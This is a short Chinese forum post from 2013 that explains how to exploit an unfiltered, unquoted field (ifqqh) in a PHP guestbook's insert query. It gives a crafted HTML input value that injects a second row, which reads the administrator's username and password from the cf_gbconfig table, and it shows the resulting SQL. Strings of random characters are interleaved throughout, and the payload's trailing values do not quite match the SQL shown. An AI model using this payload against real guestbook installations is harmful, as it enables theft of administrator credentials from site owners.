留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
2 C' S6 a( h& @4 {' _& \4 V2 L5 Y# Y6 k/ E# [# }
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。; x# L t' ]2 [6 J7 ]
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响( o7 d. F9 l+ \9 a0 H) \8 n4 J0 p
+ Q7 k% D/ z* D2 |/ w
提交的时候把ifqqh的值改一下。变成
9 _7 f6 y+ L/ Z, J( V
% G* {5 x9 o3 z<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ /> L+ m& S/ r# Z# y! [
" Q/ d. O7 B/ |& b3 z6 P e; @# @
这样SQL插入语句就变了.+ l% R9 t- _9 ]4 k* [+ p2 ?
% c2 r+ c9 P; v* c$ f/ yinsert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)2 |# M" L# N1 m- c) g; ^) U0 C+ N
8 w/ j' m, H6 p+ e. A/ c$ T构造了另外一句SQL。并且把帐号密码读出来。4 z/ _1 R8 X( \" k
; ^; R' W# Y% K5 t& R& v |
发表于 2013-2-19 08:10:11
收藏
支持
反对